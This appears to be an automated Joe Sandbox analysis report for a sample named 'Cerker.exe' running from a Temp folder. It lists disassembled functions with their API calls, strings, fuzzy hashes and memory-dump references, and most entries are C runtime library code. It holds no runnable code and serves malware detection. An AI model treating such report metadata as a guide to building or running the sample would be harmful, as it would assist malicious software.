Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: ecef9362d80eee6973115228feb63ba1c62d4b4034ad661c877188d272080aac
Instruction ID: 168eb5e195ac618d101b660315c8ab95b5739919d1e2049933ac491a4e71c61f
Opcode Fuzzy Hash: ecef9362d80eee6973115228feb63ba1c62d4b4034ad661c877188d272080aac
Instruction Fuzzy Hash: ECC18D71D002989FCB15CFA9C9809EDBBB5FF0A304F28416AE955FB341D631AD4ACB61

Function 008DF67C Relevance: 9.2, APIs: 6, Instructions: 224COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 008DF707
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 008DF795
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008DF807
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 008DF821
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008DF884
CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 008DF8A1

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: a3eac7d579ffb3e08d8d2dbde8846f34e6afd49488f25d6551fce60d10820e14
Instruction ID: 0912868dad3f9be4ad2849445ef0d16fc1f9128b7c42463653fba25d148c1fb4
Opcode Fuzzy Hash: a3eac7d579ffb3e08d8d2dbde8846f34e6afd49488f25d6551fce60d10820e14
Instruction Fuzzy Hash: 9E71823290028A9BDF219FA5DC45AEE7BB6FF45354F184237E606E6352D731C840EB61

Function 008DF442 Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 008DF48B
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 008DF4F6
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008DF513
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 008DF552
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008DF5B1
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 008DF5D4

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 35adda6d17a52cefb9de664828a85e52e9f99eedf87ad63157a70df99054328a
Instruction ID: 5b1e97ad6288716ff6beb18d470cdb2992cdc4adbff198e5f6a423b48d99d732
Opcode Fuzzy Hash: 35adda6d17a52cefb9de664828a85e52e9f99eedf87ad63157a70df99054328a
Instruction Fuzzy Hash: BE51BF7250020AABDB205F64EC45FAB7BBAFF44744F244676FA06E6251DB30CD50EB90

Function 008C1A50 Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008C1A62
std::_Lockit::_Lockit.LIBCPMT ref: 008C1A7D
std::_Lockit::~_Lockit.LIBCPMT ref: 008C1A9D
std::_Lockit::~_Lockit.LIBCPMT ref: 008C1AEE
std::_Facet_Register.LIBCPMT ref: 008C1B50
std::_Lockit::~_Lockit.LIBCPMT ref: 008C1B68

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
String ID:
API String ID: 1858714459-0
Opcode ID: 2f36ab4fe67c58867820eb373aaf2044ccb957116c8b4925a69e17bccfb6132d
Instruction ID: 95905b9cbb60b6c1af3fee4440e6d59dea0db999afeff37ea88f2a60a640a473
Opcode Fuzzy Hash: 2f36ab4fe67c58867820eb373aaf2044ccb957116c8b4925a69e17bccfb6132d
Instruction Fuzzy Hash: 19318031A052149FCB24EF58E8D5EA9B7B4FF11760B1442AED809DB352EB31EE41DB81

Function 008C40F0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 311COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 008C43BE
__fread_nolock.LIBCMT ref: 008C43E2

Strings

ios_base::badbit set, xrefs: 008C4202, 008C4228
ios_base::failbit set, xrefs: 008C420C, 008C4278
ios_base::eofbit set, xrefs: 008C4211

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: __fread_nolock
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2638373210-1866435925
Opcode ID: 723e396adf000499a8c8b88f91738125051c96e39d074e4ae8651ce66f5614ce
Instruction ID: ef093a5ea65f7ca1cb544fa168d68f832819bea781da1969b7415fba9ba80c0d
Opcode Fuzzy Hash: 723e396adf000499a8c8b88f91738125051c96e39d074e4ae8651ce66f5614ce
Instruction Fuzzy Hash: D6A15832A002089FCB14CE6DD891FAA77B6FF94324F1481AEED19CB355D631ED858B90

Function 008E2ABA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008E2AB1,008E195B,008E0747), ref: 008E2AC8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008E2AD6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008E2AEF
SetLastError.KERNEL32(00000000,008E2AB1,008E195B,008E0747), ref: 008E2B41

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 32301dd49beb44ce9e4df1342bcd81c3f9815d890972e1b0d3642d464e6eea6f
Instruction ID: b1aa8282af36696282794fa1c110c6943cccb24e4021976a5dfd1acd492109a3
Opcode Fuzzy Hash: 32301dd49beb44ce9e4df1342bcd81c3f9815d890972e1b0d3642d464e6eea6f
Instruction Fuzzy Hash: BF01D43212D7619EE6242F7BBC89A6A2BA9FB437747300639F114D61E1EF928C11A245

Function 008F3C8A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe, xrefs: 008F3C8F

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
API String ID: 0-4014939595
Opcode ID: 91775c57626dd0bef9cbf7a20f4512baae89bf6f8f553da7e1f7af7117236c09
Instruction ID: f62955f6ddcde9b74ddd57d3ff3f7d079f7549e30d2f0d123e5332743327ac07
Opcode Fuzzy Hash: 91775c57626dd0bef9cbf7a20f4512baae89bf6f8f553da7e1f7af7117236c09
Instruction Fuzzy Hash: DF21BE7120460DBFEB20AF7ACC81D7A77ADFF017687204515FA28DB151EB21EE5087A1

Function 008E3B52 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,008E3C13,?,?,0090FB4C,00000000,?,008E3D3E,00000004,InitializeCriticalSectionEx,00900988,mscoree.dll,00000000), ref: 008E3BE2

Strings

api-ms-, xrefs: 008E3BA2

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 402830c446c68f0361eba641d39a729a0965468cee4608e318e1364ad3ae81cd
Instruction ID: e77c53c85dbb4d04506521eac60c87fa84f8e13002ad94da8d4fc848e928ad20
Opcode Fuzzy Hash: 402830c446c68f0361eba641d39a729a0965468cee4608e318e1364ad3ae81cd
Instruction Fuzzy Hash: F8118A31A45765BBDB324B6A9C48B6A73A4FF83770F150511E916E72C0D770EE0086D5

Function 008E57A2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,008E5797,?,?,008E575F,00000001,00000000,?), ref: 008E57B7
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008E57CA
FreeLibrary.KERNEL32(00000000,?,?,008E5797,?,?,008E575F,00000001,00000000,?), ref: 008E57ED

Strings

CorExitProcess, xrefs: 008E57C2
mscoree.dll, xrefs: 008E57B0

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: dc28f4819e244606db901447d3bb1118df56a73e851ec2bf31029bc8b77f8f97
Instruction ID: c17840d73980777e35e4b0dc2c1d10b083ce5d8fcda6da3c9acd5ac777e81af9
Opcode Fuzzy Hash: dc28f4819e244606db901447d3bb1118df56a73e851ec2bf31029bc8b77f8f97
Instruction Fuzzy Hash: F1F01C31901719FBDB129B61DD09FAEBAAAFB8175AF100064A905E21A0DF709F50EA91

Function 008E9D8E Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008EFADD: HeapAlloc.KERNEL32(00000000,?,?,?,008E0A38,?,?,?,?,?,008C11E3,?,?), ref: 008EFB0F

_free.LIBCMT ref: 008E9E9D
_free.LIBCMT ref: 008E9EB4
_free.LIBCMT ref: 008E9ED1
_free.LIBCMT ref: 008E9EEC
_free.LIBCMT ref: 008E9F03

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free$AllocHeap
String ID:
API String ID: 1835388192-0
Opcode ID: a0b0bf5caa9c863077e4c934e0a62820519a11ea33d2d042a4753507df2131bf
Instruction ID: 7353bb07dc3b7c7a089246630d09c5f07616d3d05ae80c822a235f8afc25eb34
Opcode Fuzzy Hash: a0b0bf5caa9c863077e4c934e0a62820519a11ea33d2d042a4753507df2131bf
Instruction Fuzzy Hash: 70510372A00345AFDB21DF6ACC41A6A77F4FF56724F140569E989D7290E7B1ED01CB40

Function 008F52E8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008F5300

Part of subcall function 008EBF97: HeapFree.KERNEL32(00000000,00000000,?,008F5589,?,00000000,?,?,?,008F582C,?,00000007,?,?,008F5D1F,?), ref: 008EBFAD
Part of subcall function 008EBF97: GetLastError.KERNEL32(?,?,008F5589,?,00000000,?,?,?,008F582C,?,00000007,?,?,008F5D1F,?,?), ref: 008EBFBF

_free.LIBCMT ref: 008F5312
_free.LIBCMT ref: 008F5324
_free.LIBCMT ref: 008F5336
_free.LIBCMT ref: 008F5348

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9d4357ebcfd1a808044e387b55558decc34f0ce4d4dc363f0a2ce99146f718ed
Instruction ID: 63708786049c111ce3a4c602638dc5d65c810ba4da5e2525a28aafd72e2a898e
Opcode Fuzzy Hash: 9d4357ebcfd1a808044e387b55558decc34f0ce4d4dc363f0a2ce99146f718ed
Instruction Fuzzy Hash: 61F0FF3291C748AFC660EBADE981C2B7BD9FA067507540C05F319D7601CB70FC809A65

Function 008C1CC0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 174COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 008C1D46

Strings

ios_base::badbit set, xrefs: 008C1E86, 008C1EAF
ios_base::failbit set, xrefs: 008C1E90
ios_base::eofbit set, xrefs: 008C1E95

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Initstd::locale::_
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1620887387-1866435925
Opcode ID: ed07688b0e296b201a9cc7a4fe3ee51a66f07a88ec97adff863050055ce4d631
Instruction ID: 7e05f12918ee99d0168c5f61107b01da569fc76c3d622d5bbc325a7fddab8ede
Opcode Fuzzy Hash: ed07688b0e296b201a9cc7a4fe3ee51a66f07a88ec97adff863050055ce4d631
Instruction Fuzzy Hash: 046145B1A002099FDB10CF68C8D5B9ABBF4FF48304F1484A9EA09DB346D775E945CBA1

Function 008C23F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 008C254F

Strings

ios_base::badbit set, xrefs: 008C24E3, 008C250C, 008C2533
ios_base::failbit set, xrefs: 008C24ED
ios_base::eofbit set, xrefs: 008C24F2

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: ff67d2aa98a0ff43d034b4342e0cb9b1d6a7c3d8960d1a63932ffba3f2909df3
Instruction ID: a4ce66c3758dff584efc37f213eeb6fa46fa802e94326834dd6220f88230fb49
Opcode Fuzzy Hash: ff67d2aa98a0ff43d034b4342e0cb9b1d6a7c3d8960d1a63932ffba3f2909df3
Instruction Fuzzy Hash: B751A9766006189FCB24CF68C880EA9B7F4FF58314B1481AEEA09DB752D731ED05CBA4

Function 008C1ED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 008C1F88

Strings

ios_base::badbit set, xrefs: 008C2023, 008C204C
ios_base::failbit set, xrefs: 008C202D
ios_base::eofbit set, xrefs: 008C2032

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Initstd::locale::_
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1620887387-1866435925
Opcode ID: 548c53e8ca11d1dbba33fb3d341dd3846f9510201a8d2179b541123165fb2edf
Instruction ID: 55b02f85b871d45975297581502f38a049bfbf2ddd5bcc2d0f9ae1e0b8117054
Opcode Fuzzy Hash: 548c53e8ca11d1dbba33fb3d341dd3846f9510201a8d2179b541123165fb2edf
Instruction Fuzzy Hash: FD416AB06007059FEB20DF69C499B5ABBF4FF04304F44852DEA4ACB692D7B5E918CB91

Function 008D4210 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 008D4279

Part of subcall function 008DE8C0: std::_Lockit::_Lockit.LIBCPMT ref: 008DE8D2
Part of subcall function 008DE8C0: std::locale::_Setgloballocale.LIBCPMT ref: 008DE8ED
Part of subcall function 008DE8C0: _Yarn.LIBCPMT ref: 008DE903
Part of subcall function 008DE8C0: std::_Lockit::~_Lockit.LIBCPMT ref: 008DE943

Strings

ios_base::badbit set, xrefs: 008D430F, 008D4338
ios_base::failbit set, xrefs: 008D4319
ios_base::eofbit set, xrefs: 008D431E

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 238635018-1866435925
Opcode ID: a776930508eac12e70f9b09e99ebc02096d64bec8fe864971a3581fb2ada35c4
Instruction ID: 778de1a7cbdeb9bc0a9ce5a73b1d646eb769c1e9130f8f8b734b81ff211ff518
Opcode Fuzzy Hash: a776930508eac12e70f9b09e99ebc02096d64bec8fe864971a3581fb2ada35c4
Instruction Fuzzy Hash: F1319EB19007049FE720DF69C449B5BB7F4FF54304F048A2AE946CB781E7B5E9088B91

Function 008CE8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 008CE947
CloseHandle.KERNEL32(?), ref: 008CE95A
CloseHandle.KERNEL32(?), ref: 008CE95F

Strings

D, xrefs: 008CE8FA

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: d4164659359458a074c7edfc7d31ee380f8d8e3152e1c8a5f917766dfcd0129d
Instruction ID: f53b979e61ff05180d68e854c6d2dd3dd9840fb48e428b1b7bf89d0679f1aaac
Opcode Fuzzy Hash: d4164659359458a074c7edfc7d31ee380f8d8e3152e1c8a5f917766dfcd0129d
Instruction Fuzzy Hash: C5317E32D1021DABDB109F94CD45BEEBB7AFF99314F24521AE504B7284DBB0A984CBD1

Function 008EFF6B Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 008EFFF5

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: baa62c8111508225817319dd1be884d816bd16b82f7b4bf7868aea9b7a7ecd7c
Instruction ID: bd1429704d886fee3938d865a468c689140904f15f32eef64c32352b4b3cfbe3
Opcode Fuzzy Hash: baa62c8111508225817319dd1be884d816bd16b82f7b4bf7868aea9b7a7ecd7c
Instruction Fuzzy Hash: C7B1F33290068D9FDB128F78C8817BEBBE5FF95340F24416AEA44EB243D6359E41CB61

Function 008E2BD1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 008E2C98
___AdjustPointer.LIBCMT ref: 008E2CBB
___AdjustPointer.LIBCMT ref: 008E2D57

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 5a43b255cd7d13db6557e72b92c935d615d444c3999fb133e53d3df7436061b3
Instruction ID: 97af00959b3e6554ff06c1e80073ecd67d0b477c668e830a426dc54e2bdec06f
Opcode Fuzzy Hash: 5a43b255cd7d13db6557e72b92c935d615d444c3999fb133e53d3df7436061b3
Instruction Fuzzy Hash: 5851037160428AAFEB298F16CC41BBA73B9FF46714F24452DE905C76A0E731EC81DB91

Function 008FBA74 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008FBB44
_free.LIBCMT ref: 008FBB6D
SetEndOfFile.KERNEL32(00000000,008F9E5D,00000000,008FA0F4,?,?,?,?,?,?,?,008F9E5D,008FA0F4,00000000), ref: 008FBB9F
GetLastError.KERNEL32(?,?,?,?,?,?,?,008F9E5D,008FA0F4,00000000,?,?,?,?,00000000), ref: 008FBBBB

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
